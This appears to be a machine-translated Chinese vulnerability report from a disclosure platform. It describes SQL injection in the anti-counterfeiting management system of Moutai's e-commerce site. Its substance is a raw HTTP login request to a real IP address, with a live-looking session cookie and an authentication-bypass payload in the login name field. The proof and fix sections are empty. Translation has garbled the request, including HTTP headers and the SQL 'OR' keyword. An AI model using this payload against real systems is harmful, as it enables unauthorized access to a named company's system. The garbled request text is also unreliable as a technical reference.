漏洞标题 茅台电子商务的反假冒和反走私管理系统存在SQL注入漏洞 相关制造商 Emaotai.cn 漏洞作者 过路人 提交时间 2016-06-18 19: 12 公共时间 2016-06-26 09: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 11 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 POST /index.php/welcome/index HTTP/1.1 内容长度: 91 内容类型: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer:http://202.98.213.133/ Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224450a12d480df3d68e78d987a6e82f4b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22124.114.79.236% 22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0 +%28Windows + NT + 6.1%3B + WOW64%29 + AppleWebKit%2F537.21 +%28KHTML%2C + like + Gecko %29 + Chrome%2F41.0.2228.0 + Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1466073468%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22 %22%3B%7D92a6bd6f977b2ad7ca38653a091cf7be 主机: 202.98.213.133 连接:保持活动状态 Accept-Encoding: gzip,deflate 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21 接受: */* loginName=-1'或1=1 * - & loginPwd=hbwnjcpe& postFlag=1
漏洞证明: 修理计划: 版权声明:请注明出处。居民A @乌云